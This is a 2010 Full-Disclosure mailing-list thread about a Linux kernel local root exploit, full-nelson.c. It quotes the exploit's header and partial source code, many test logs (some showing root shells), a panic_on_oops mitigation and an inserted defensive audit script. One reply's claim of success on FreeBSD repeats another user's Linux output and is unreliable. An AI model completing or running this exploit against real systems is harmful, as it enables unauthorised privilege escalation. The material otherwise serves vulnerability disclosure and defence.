Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread Cal Leeming [Simplicity Media Ltd]
Anyone tested this in sandbox yet?

On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:
>
> Happy hacking,
> Dan
>
>
> --snip--
>
> /*
>  * Linux Kernel <= 2.6.37 local privilege escalation
>  * by Dan Rosenberg
>  * @djrbliss on twitter
>  *
>  * Usage:
>  * gcc full-nelson.c -o full-nelson
>  * ./full-nelson
>  *
>  * This exploit leverages three vulnerabilities to get root, all of which were
>  * discovered by Nelson Elhage:
>  *
>  * CVE-2010-4258
>  * -
>  * This is the interesting one, and the reason I wrote this exploit.  If a
>  * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL
>  * word will be written to a user-specified pointer when that thread exits.
>  * This write is done using put_user(), which ensures the provided destination
>  * resides in valid userspace by invoking access_ok().  However, Nelson
>  * discovered that when the kernel performs an address limit override via
>  * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,
>  * etc.), this override is not reverted before calling put_user() in the exit
>  * path, allowing a user to write a NULL word to an arbitrary kernel address.
>  * Note that this issue requires an additional vulnerability to trigger.
>  *
>  * CVE-2010-3849
>  * -
>  * This is a NULL pointer dereference in the Econet protocol.  By itself, it's
>  * fairly benign as a local denial-of-service.  It's a perfect candidate to
>  * trigger the above issue, since it's reachable via sock_no_sendpage(), which
>  * subsequently calls sendmsg under KERNEL_DS.
>  *
>  * CVE-2010-3850
>  * -
>  * I wouldn't be able to reach the NULL pointer dereference and trigger the
>  * OOPS if users weren't able to assign Econet addresses to arbitrary
>  * interfaces due to a missing capabilities check.
>  *
>  * In the interest of public safety, this exploit was specifically designed to
>  * be limited:
>  *
>  *  * The particular symbols I resolve are not exported on Slackware or Debian
>  *  * Red Hat does not support Econet by default
>  *  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
>  *    Debian
>  *
>  * However, the important issue, CVE-2010-4258, affects everyone, and it would
>  * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>  * more sophisticated version of this that doesn't have the roadblocks I put in
>  * to prevent abuse by script kiddies.
>  *
>  * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
>  *
>  * NOTE: the exploit process will deadlock and stay in a zombie state after you
>  * exit your root shell because the Econet thread OOPSes while holding the
>  * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't bother.
>  *
>  * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
>  */
>
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
> #include
>
> /* How many bytes should we clear in our
>   * function pointer to put it into userspace? */
> #ifdef __x86_64__
> #define SHIFT 24
> #define OFFSET 3
> #else
> #define SHIFT 8
> #define OFFSET 1
> #endif
>
> /* thanks spender... */
> unsigned long get_kernel_sym(char *name)
> {
>   FILE *f;
>   unsigned long addr;
>   char dummy;
>   char sname[512];
>   struct utsname ver;
>   int ret;
>   int rep = 0;
>   int oldstyle = 0;
>
>   f = fopen("/proc/kallsyms", "r");
>   if (f == NULL) {
>   f = fopen("/proc/ksyms", "r");
>   if (f == NULL)
>   goto fallback;
>   oldstyle = 1;
>   }
>
> repeat:
>   ret = 0;
>   while(ret != EOF) {
>   if (!oldstyle)
>   ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, 
> sname);
>   else {
>   ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
>   if (ret == 2) {
>   char *p;
>   if (strstr(sname, "_O/") || strstr(sname, 
> "_S."))
>   continue;
>   p = strrchr(sname, '_');
>   if (p>  ((char *)sname + 5)&&  !strncmp(p - 3, 
> "smp", 3)) {
>   p = p - 4;
>   while (p>  (char *)sname&&  *(p - 1) == 
> '_')
>   p--;
>   *p = '\0';
>   }
>   }
>   }
>   if (ret == 0) {
>   fscanf(f, "%s\

Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread Ryan Sears
Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 
2.6.35-22-generic). Works as expected. 

Great job Dan. You're full of win!

Regards,
Ryan Sears

Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread coderman
On Tue, Dec 7, 2010 at 12:25 PM, Dan Rosenberg
 wrote:
> ... I've included here a proof-of-concept local privilege escalation 
> exploit...
>  * This exploit leverages three vulnerabilities to get root, all of which were
>  * discovered by Nelson Elhage:
>...
>  * However, the important issue, CVE-2010-4258, affects everyone, and it would
>  * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
>  * more sophisticated version of this...

nice :)

clearly demonstrates why risk is complicated and seemingly minor
defects (worth delaying patches for weeks/months? ;) can combine into
truly ugly vulnerabilities...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Linux kernel exploit

2010-12-07 Thread Rem7ter
Why does gcc exp.c -o exp give the alert "Error: too many Argument"?  I tested it on Linux
2.6.X.


Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread mezgani ali
It worked on 2.6.35.7, nice exploit.




-- 
Ali MEZGANI
Network Engineering/Security
http://securfox.wordpress.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Guillaume Friloux
Doesn't work here on Ubuntu 10.10 (VirtualBox) clean install (but with
all updates) with only an “apt-get install build-essential”.


k...@kuri-virtualbox:~$ cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=10.10
DISTRIB_CODENAME=maverick
DISTRIB_DESCRIPTION="Ubuntu 10.10"
k...@kuri-virtualbox:~$ uname -a
Linux kuri-VirtualBox 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 
10:18:49 UTC 2010 i686 GNU/Linux

k...@kuri-virtualbox:~$ gcc -o exploit exploit.c
k...@kuri-virtualbox:~$ ./exploit
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf81ca340
[+] Resolved econet_ops to 0xf81ca440
[+] Resolved commit_creds to 0xc016c8d0
[+] Resolved prepare_kernel_cred to 0xc016cd20
[*] Calculating target...
[*] Triggering payload...
[*] Exploit failed to get root.
k...@kuri-virtualbox:~$


Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Kai

 > Anyone tested this in sandbox yet?

00:37 linups:../expl/kernel > cat /etc/*release*
openSUSE 11.3 (i586)
VERSION = 11.3
00:37 linups:../expl/kernel > uname -r
2.6.34.4-0.1-desktop
00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
00:37 linups:../expl/kernel > ./test
[*] Failed to open file descriptors.



Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Thomas SOETE
Failed on Ubuntu 10.10 (2.6.35-23-generic)

t...@bifrost:/tmp$ uname -a
Linux bifrost 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC
2010 x86_64 GNU/Linux

t...@bifrost:/tmp$ ./a.out
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xa03d9610
 [+] Resolved econet_ops to 0xa03d9720
 [+] Resolved commit_creds to 0x810863c0
 [+] Resolved prepare_kernel_cred to 0x81086890
[*] Calculating target...
[*] Triggering payload...
[*] Exploit failed to get root.





Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Dan Rosenberg
If you've applied all your Ubuntu updates, the exploit is not going to
work.  I decided to take a more responsible approach to exploit
publishing with this release.  Rather than publish a fully weaponized
exploit that could be used by script kiddies everywhere to compromise
innocent users' machines, I published a limited version that proves
the exploitability of the issue without putting too many people at
unnecessary risk.  As I said, the exploit could be easily adapted to
work on any current distribution, since fixes for CVE-2010-4258 are
not available yet.

Please read the exploit text before you run it next time.  ;)

Quote:

* In the interest of public safety, this exploit was specifically designed to
* be limited:
*
*  * The particular symbols I resolve are not exported on Slackware or Debian
*  * Red Hat does not support Econet by default
*  * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and
*    Debian
*
* However, the important issue, CVE-2010-4258, affects everyone, and it would
* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly
* more sophisticated version of this that doesn't have the roadblocks I put in
* to prevent abuse by script kiddies.
*
* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
*

-Dan



Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread nix

Failed also as expected on my custom 2.6.32.25-grsec #3 SMP x86_64 GNU/Linux.
Nice find anyway while we are waiting for other versions :)



Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Marcus Meissner
On Wed, Dec 08, 2010 at 12:44:09AM +0300, Kai wrote:
> 
>  > Anyone tested this in sandbox yet?
> 
> 00:37 linups:../expl/kernel > cat /etc/*release*
> openSUSE 11.3 (i586)
> VERSION = 11.3
> 00:37 linups:../expl/kernel > uname -r
> 2.6.34.4-0.1-desktop
> 00:37 linups:../expl/kernel > gcc _2.6.37.local.c -o test
> 00:37 linups:../expl/kernel > ./test
> [*] Failed to open file descriptors.

openSUSE 11.2 and 11.3 do not have ECONET compiled,
openSUSE 11.1 has ECONET, but not the 0 ptr deref issue.

The CVE-2010-4258 problem is however in all openSUSEs.

Temporary workaround (for all distributions, not just openSUSE):
echo 1 > /proc/sys/kernel/panic_on_oops
This will now panic the machine instead of making it exploitable.

Ciao, Marcus



Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Sherwyn
It works for me with the default install on Ubuntu 10.10, kernel
2.6.35-22-generic; once you run the updates it changes to 2.6.35-23 and then it
fails.
Infolookup
http://infolookup.securegossip.com
www.twitter.com/infolookup



Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread dave b
I ran it and my computer turned into a mudkip. I took a picture which
I have uploaded at [0]
I didn't read the instructions, was I supposed to?


[0] - 
http://www.aspectofthehare.net/wp-content/uploads/2009/07/MudkipComputerGame.png



Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread John Jacobs

> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:

Hello Dan, is this exploitation not mitigated by best practice 
defense-in-depth strategies such as preventing the CAP_SYS_MODULE 
capability or '/sbin/sysctl -w kernel.modules_disabled=1' respectively? 
 It seems it'd certainly stop the Econet/Acorn issue.

Curious to hear your input as I fear too many rely solely on errata updates and 
not a good defense-in-depth approach.

> Happy hacking,
> Dan

Cheers,
John Jacobs
  
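The following is an added example, not a message from the thread and not part of full-nelson.c: a defender-side audit script that checks the hardening discussed above, Marcus Meissner's kernel.panic_on_oops workaround for CVE-2010-4258 and the kernel.modules_disabled setting John Jacobs asks about, together with whether the running kernel is in the "<= 2.6.37" range from Dan's header and whether the Econet protocol (the CVE-2010-3849/CVE-2010-3850 trigger) is present. The version parsing and the econet_present() heuristics are my assumptions; the script only reports and changes nothing.

```shell
#!/bin/sh
# Added example (not from the thread or from full-nelson.c): report the state
# of the mitigations discussed for CVE-2010-4258 (NULL write through put_user()
# after an OOPS under set_fs(KERNEL_DS)) and for the Econet bugs it is chained
# with here (CVE-2010-3849, CVE-2010-3850). Assumptions: the "<= 2.6.37" range
# quoted from the exploit header, and the heuristics in econet_present().

# Strip a distro suffix such as "-23-generic" and print "major minor patch".
ver_fields() {
    v=${1%%-*}
    echo "$v" | awk -F. '{ printf "%d %d %d", $1, $2, $3 }'
}

# Succeeds when kernel release $1 is at or below release $2 (numeric compare).
version_le() {
    set -- $(ver_fields "$1") $(ver_fields "$2")
    [ "$1" -lt "$4" ] && return 0
    [ "$1" -gt "$4" ] && return 1
    [ "$2" -lt "$5" ] && return 0
    [ "$2" -gt "$5" ] && return 1
    [ "$3" -le "$6" ]
}

# Print a /proc/sys knob, or "unknown" when it is not readable.
read_knob() {
    if [ -r "$1" ]; then cat "$1"; else echo unknown; fi
}

# Heuristic (assumption): Econet is reachable if the module is loaded, shipped
# for this kernel, or built in. Kai's openSUSE run stopped at "Failed to open
# file descriptors" because the protocol was not compiled in at all.
econet_present() {
    rel=$1
    grep -q '^econet ' /proc/modules 2>/dev/null && return 0
    [ -d "/lib/modules/$rel/kernel/net/econet" ] && return 0
    grep -q '^CONFIG_ECONET=y' "/boot/config-$rel" 2>/dev/null
}

# assess <release> <panic_on_oops> <modules_disabled> <econet yes|no>
# Prints one finding per line; the return value is the number of open issues.
assess() {
    rel=$1; poo=$2; mod=$3; econet=$4; issues=0
    if version_le "$rel" 2.6.37; then
        if [ "$poo" = 1 ]; then
            echo "CVE-2010-4258: kernel $rel is in the affected range; panic_on_oops=1 workaround is active"
        else
            echo "CVE-2010-4258: kernel $rel is in the affected range and panic_on_oops=$poo (workaround: echo 1 > /proc/sys/kernel/panic_on_oops)"
            issues=$((issues + 1))
        fi
    else
        echo "CVE-2010-4258: kernel $rel is outside the <= 2.6.37 range given in the header"
    fi
    if [ "$econet" = yes ]; then
        echo "Econet: available, so the CVE-2010-3849/CVE-2010-3850 trigger path exists unless patched"
        issues=$((issues + 1))
    else
        echo "Econet: not available, the trigger used by full-nelson.c is unreachable"
    fi
    # modules_disabled=1 stops any further module from loading; it does not
    # unload a module that is already present.
    if [ "$mod" = 1 ]; then
        echo "modules_disabled=1: no further modules (econet.ko included) can be loaded"
    else
        echo "modules_disabled=$mod: modules such as econet.ko can still be loaded on demand"
        issues=$((issues + 1))
    fi
    return $issues
}

# Gather live values from this host and run the assessment.
audit_live() {
    rel=$(uname -r)
    if econet_present "$rel"; then e=yes; else e=no; fi
    assess "$rel" "$(read_knob /proc/sys/kernel/panic_on_oops)" \
           "$(read_knob /proc/sys/kernel/modules_disabled)" "$e"
}

# Only touch the live host when asked, so the functions can also be sourced.
if [ "${1:-}" = "--live" ]; then
    audit_live
fi
```

Run it as `sh audit.sh --live`; the exit status is the number of open findings, so it drops into a cron job or config-check pipeline unchanged.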


Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread niklas | brueckenschlaeger
Debian lenny:

  nik...@sandbox:~$ uname -a
  Linux sandbox 2.6.26-2-amd64 #1 SMP Thu Sep 16 15:56:38 UTC 2010
x86_64 GNU/Linux
  nik...@sandbox:~$ make full-nelson
  cc full-nelson.c   -o full-nelson
  nik...@sandbox:~$ ./full-nelson
  [*] Resolving kernel addresses...
   [+] Resolved econet_ioctl to 0xa01d319b
   [+] Resolved econet_ops to 0xa01d41e0
  [*] Failed to resolve kernel symbols.




Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread leandro_lista
Works in kernel 2.6.32-24



Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19
01:38:40 UTC 2010 x86_64 GNU/Linux

ind...@indzin-desktop:~$ ./nels 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xa0239510
 [+] Resolved econet_ops to 0xa0239600
 [+] Resolved commit_creds to 0x8108bd90
 [+] Resolved prepare_kernel_cred to 0x8108c170
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root)
# 


:)



-Original Message-
From: Cal Leeming [Simplicity Media Ltd]

Reply-to: cal.leem...@simplicitymedialtd.co.uk
To: Dan Rosenberg 
Cc: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com
Subject: Re: [Full-disclosure] Linux kernel exploit
Date: Tue, 07 Dec 2010 21:06:44 +


Anyone tested this in sandbox yet?

On 07/12/2010 20:25, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Benji
working here as well

ownst...@local[~]$ uname -a
FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23 08:30:18
UTC 2010 r...@benjir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC amd64
ownst...@local[~]$ ./w00tw00t
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xa0239510
[+] Resolved econet_ops to 0xa0239600
[+] Resolved commit_creds to 0x8108bd90
[+] Resolved prepare_kernel_cred to 0x8108c170
[*] Calculating target...

[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root)
#

On Wed, Dec 8, 2010 at 7:15 PM, leandro_lista
wrote:

>  Works in kernel 2.6.32-24

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread David Flores
:~$ gcc nel.c
:~$ ./a.out
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf9c47280
 [+] Resolved econet_ops to 0xf9c47360
 [+] Resolved commit_creds to 0xc01625a0
 [+] Resolved prepare_kernel_cred to 0xc01627a0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# whoami
root
# id
uid=0(root) gid=0(root)
# uname -a
Linux sistemas 2.6.31-22-generic #65-Ubuntu SMP Thu Sep 16 15:48:58 UTC 2010
i686 GNU/Linux
#

On Wed, Dec 8, 2010 at 14:56, Benji  wrote:

> working here as well

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Rem7ter
Failed on Ubuntu 10.10:

uname -a;
Linux admin-desktop 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 10:18:49 UTC
2010 i686 GNU/Linux

[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xe0858340
[+] Resolved econet_ops to 0xe0858440
[+] Resolved commit_creds to 0xc016c8d0
[+] Resolved prepare_kernel_cred to 0xc016cd20
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Exploit failed to get root.

2010/12/8 David Flores 

>
> :~$ gcc nel.c
> :~$ ./a.out

Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread Ed Carp
On Tue, Dec 7, 2010 at 1:21 PM, Ryan Sears  wrote:

> Yep, just tested it in an Ubuntu 10.10 sandbox I have (running kernel 
> 2.6.35-22-generic). Works as expected.
>
> Great job Dan. You're full of win!

Except that he needs to clean up his code - no one uses goto anymore.



Re: [Full-disclosure] Linux kernel exploit

2010-12-08 Thread nArEn ÁĹ0ПΞ Ŵ0ĹŦஇ
Worked on Ubuntu 10.10 .. awesome work :)


On Thu, Dec 9, 2010 at 11:15 AM, Ed Carp  wrote:

> Except that he needs to clean up his code - no one uses goto anymore.



-- 
ܔܢܜܔNaReN(๏̯͡๏)
ιηƒσямαт!ση ~# αησтнєя ηαмє σƒ gσ∂ ~●•●•●๋•

Re: [Full-disclosure] Linux kernel exploit

2010-12-09 Thread Vadim Grinco
$ ./nelson
[*] Failed to open file descriptors.
$ uname -r
2.6.35.6-48.fc14.x86_64
$ cat /etc/redhat-release
Fedora release 14 (Laughlin)

But I updated a couple of days ago.

-- 
Best regards,
Vadim



Re: [Full-disclosure] Linux kernel exploit

2010-12-09 Thread Sherif Mousa
Hi Dan,

Tested on:

kernel 2.6.32 (Ubuntu 10.04) >> worked.
kernel 2.6.28 >> didn’t work. (Failed to open file descriptors)

Nice work, Dan.

Regards,
Sherif



On Tue, Dec 7, 2010 at 10:25 PM, Dan Rosenberg wrote:

> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:

Re: [Full-disclosure] Linux kernel exploit

2010-12-09 Thread Jean Pierre Dentone
a few tests

[...@yangtao ~]$ ./extest
./extest: error while loading shared libraries: requires glibc 2.5 or 
later dynamic linker
[...@yangtao ~]$ uname -r
2.6.9-89.0.25.ELsmp
[...@yangtao ~]$ cat /etc/redhat-release
CentOS release 4.8 (Final)

==

[...@kernel ~]$ ./extest
[*] Failed to open file descriptors.
[...@kernel ~]$ uname -r
2.6.35.4
[...@kernel ~]$ cat /etc/redhat-release
CentOS release 5.2 (Final)

==

[...@kernel64 ~]$ ./extest
[*] Failed to open file descriptors.
[...@kernel64 ~]$ uname -r
2.6.33.1
[...@kernel64 ~]$ cat /etc/redhat-release
CentOS release 5.5 (Final)

On 12/8/2010 4:42 PM, Vadim Grinco wrote:
> $ ./nelson
> [*] Failed to open file descriptors.



Re: [Full-disclosure] Linux kernel exploit

2010-12-10 Thread Urlan
One more test:

t...@test:~/Downloads$ ./testing
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xa0026610
 [+] Resolved econet_ops to 0xa0026720
 [+] Resolved commit_creds to 0x810863c0
 [+] Resolved prepare_kernel_cred to 0x81086890
[*] Calculating target...
[*] Triggering payload...
[*] Exploit failed to get root.
t...@test:~/Downloads$ uname -a
Linux test 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC 2010
x86_64 GNU/Linux

Urlan

2010/12/9 Jean Pierre Dentone 

> a few tests



-- 
_
Urlan Salgado de Barros
MSc. Student in Applied Informatics
Member of NR2 Group
Federal University of Paraná - Curitiba - Brazil
URL: 

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Francisco J
h...@darkstar:~$ cat /etc/slackware-version
Slackware 13.1.0
h...@darkstar:~$ uname -a
Linux darkstar 2.6.33.4-smp #2 SMP Wed May 12 22:47:36 CDT 2010 i686 
Intel(R) Core(TM)2 CPU T5600  @ 1.83GHz GenuineIntel GNU/Linux
h...@darkstar:~$ cc full-nelson.c -o full-nelson
h...@darkstar:~$ ./full-nelson
[*] Failed to open file descriptors.


On 12/7/2010 6:25 PM, Dan Rosenberg wrote:
> Hi all,
>
> I've included here a proof-of-concept local privilege escalation exploit
> for Linux.  Please read the header for an explanation of what's going
> on.  Without further ado, I present full-nelson.c:

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread R0me0 ***
sp...@alucard ~ $ uname -a
Linux alucard 2.6.35-zen2-knight #1 ZEN SMP PREEMPT Wed Dec 1 12:34:54 BRST
2010 x86_64 Intel(R) Core(TM)2 Duo CPU T6400 @ 2.00GHz GenuineIntel
GNU/Linux
sp...@alucard ~ $ gcc -o nerso full-nelson.c
sp...@alucard ~ $ ./nerso
[*] Failed to open file descriptors.


2010/12/13 Francisco J 

> h...@darkstar:~$ cat /etc/slackware-version
> Slackware 13.1.0
> >   *
> >   * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.
> >   *
> >   * NOTE: the exploit process will deadlock and stay in a zombie state
> after you
> >   * exit your root shell because the Econet thread OOPSes while holding
> the
> >   * Econet mutex.  It wouldn't be too hard to fix this up, but I didn't
> bother.
> >   *
> >   * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla
> >   */
> >
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> > #include
> >
> > /* How many bytes should we clear in our
> >   * function pointer to put it into userspace? */
> > #ifdef __x86_64__
> > #define SHIFT 24
> > #define OFFSET 3
> > #else
> > #define SHIFT 8
> > #define OFFSET 1
> > #endif
> >
> > /* thanks spender... */
> > unsigned long get_kernel_sym(char *name)
> > {
> >   FILE *f;
> >   unsigned long addr;
> >   char dummy;
> >   char sname[512];
> >   struct utsname ver;
> >   int ret;
> >   int rep = 0;
> >   int oldstyle = 0;
> >
> >   f = fopen("/proc/kallsyms", "r");
> >   if (f == NULL) {
> >   f = fopen("/proc/ksyms", "r");
> >   if (f == NULL)
> >   goto fallback;
> >   oldstyle = 1;
> >   }
> >
> > repeat:
> >   ret = 0;
> >   while(ret != EOF) {
> >   if (!oldstyle)
> >   ret = fscanf(f, "%p 

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Benji
I heard rumors it's backdoored and sends your /etc/passwd and uname to Dan
Rosenberg.

Just sayin'

On Mon, Dec 13, 2010 at 3:27 PM,  wrote:

> I tested it on a VM with CentOS 5.5 i386 updated and did not work.
>
> Last login: Tue Dec 13 12:48:54 2010
> [r...@localhost ~]# nano full-nelson.c
> [r...@localhost ~]# gcc -o full-nelson.c full-nelson
> [r...@localhost ~]# ./full-nelson
> [*] Failed to open file descriptors.
> [r...@localhost ~]# uname -a
> Linux localhost.localdomain 2.6.18-194.26.1.el5 #1 SMP Thu Nov 9 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
> [r...@localhost ~]#
>
> My 10 cents:)
>
> @firebitsbr
>
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread firebits
I tested it on a VM with CentOS 5.5 i386 updated and did not work.

Last login: Tue Dec 13 12:48:54 2010
[r...@localhost ~]# nano full-nelson.c
[r...@localhost ~]# gcc -o full-nelson.c full-nelson
[r...@localhost ~]# ./full-nelson
[*] Failed to open file descriptors.
[r...@localhost ~]# uname -a
Linux localhost.localdomain 2.6.18-194.26.1.el5 #1 SMP Thu Nov 9 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
[r...@localhost ~]#

My 10 cents:)

@firebitsbr



Re: [Full-disclosure] Linux Kernel Exploit

2010-12-13 Thread highteck
On 13/12/2010 12:03 PM, highteck wrote:
> r...@bt:~# su test
> sh-3.2$ cd /tmp
> sh-3.2$ id;uname -a
> uid=1000(test) gid=1000(test) groups=1000(test)
> Linux bt 2.6.34 #1 SMP Wed Jul 21 09:51:09 EDT 2010 i686 GNU/Linux
> sh-3.2$ ls
> full-nelson.c
> sh-3.2$ gcc full-nelson.c -o full-nelson
> sh-3.2$ ./full-nelson
> [*] Failed to open file descriptors.
> sh-3.2$
>
>
> (3:841)$ uname -a;id
> Linux lemon 2.6.32.25-grsec-c0re #1 SMP Sat Nov 20 15:12:27 EST 2010 
> i686 GNU/Linux
> uid=1000(test) gid=1000(test) 
> groups=1000(test,20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev)
> (3:842)$ gcc full-nelson.c -o full-nelson
> (3:843)$ ./full-nelson
> [*] Failed to open file descriptors.
>
>



Re: [Full-disclosure] Linux Kernel Exploit

2010-12-13 Thread highteck
On 13/12/2010 12:05 PM, highteck wrote:
> Posted by Benji on Dec 13
>
> I heard rumors it's backdoored and sends your /etc/passwd and uname to 
> Dan
> Rosenberg.
>
> Just sayin'
>
>
> ^^^
>
> 1. Where's the shellcode to hide such a process?
> 2. Do you see /etc/passwd anywhere in there?
> 3. Dan Rosenberg is a respected person in the community and I highly
> doubt he would do that.
>
>
> Read the code, man.



Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Ariel Biener
But he said that RedHat (and thus CentOS) doesn't have Econet enabled by
default.

--Ariel

fireb...@backtrack.com.br wrote:
> I tested it on a VM with CentOS 5.5 i386 updated and did not work.
>
> Last login: Tue Dec 13 12:48:54 2010
> [r...@localhost ~]# nano full-nelson.c
> [r...@localhost ~]# gcc -o full-nelson.c full-nelson
> [r...@localhost ~]# ./full-nelson
> [*] Failed to open file descriptors.
> [r...@localhost ~]# uname -a
> Linux localhost.localdomain 2.6.18-194.26.1.el5 #1 SMP Thu Nov 9 12:54:40 EST 2010 i686 i686 i386 GNU/Linux
> [r...@localhost ~]#
>
> My 10 cents:)
>
> @firebitsbr
>
>   

-- 
 --
 Ariel Biener
 e-mail: ar...@post.tau.ac.il
 PGP: http://www.tau.ac.il/~ariel/pgp.html



Re: [Full-disclosure] Linux kernel exploit

2010-12-13 Thread Cal Leeming [Simplicity Media Ltd]
I've seen far too many people just sending back "Failed to open file
descriptors" without giving any indication as to what could have happened.
:| Can people *please* remember to send the author as much debug as possible
(at the very least, an strace), so they can at least see what's going on.
Can people also use uname -a, rather than just -r, so it indicates what arch
is being used.


Anyway, the code failed on our sandbox; see below:

 f...@sandbox01.simplicitymedialtd.co.uk [~] > gcc test.c -o full-nelson

 f...@sandbox01.simplicitymedialtd.co.uk [~] > ./full-nelson
[*] Failed to open file descriptors.

 f...@sandbox01.simplicitymedialtd.co.uk [~] > uname -a
Linux sandbox01.simplicitymedialtd.co.uk 2.6.32.25-grsec #1 SMP Wed Nov 24
02:26:04 GMT 2010 x86_64 GNU/Linux

 f...@sandbox01.simplicitymedialtd.co.uk [~] > cat /etc/issue
Debian GNU/Linux 5.0 \n \l

 f...@courtney.simplicitymedialtd.co.uk [~] > strace ./full-nelson
execve("./full-nelson", ["./full-nelson"], [/* 17 vars */]) = 0
brk(0) = 0x601a98
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f016b504000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f016b502000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=15513, ...}) = 0
mmap(NULL, 15513, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f016b4fe000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\300\342\1\0\0\0\0\0@"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1375536, ...}) = 0
mmap(NULL, 3482232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f016af98000
mprotect(0x7f016b0e2000, 2093056, PROT_NONE) = 0
mmap(0x7f016b2e1000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x149000) = 0x7f016b2e1000
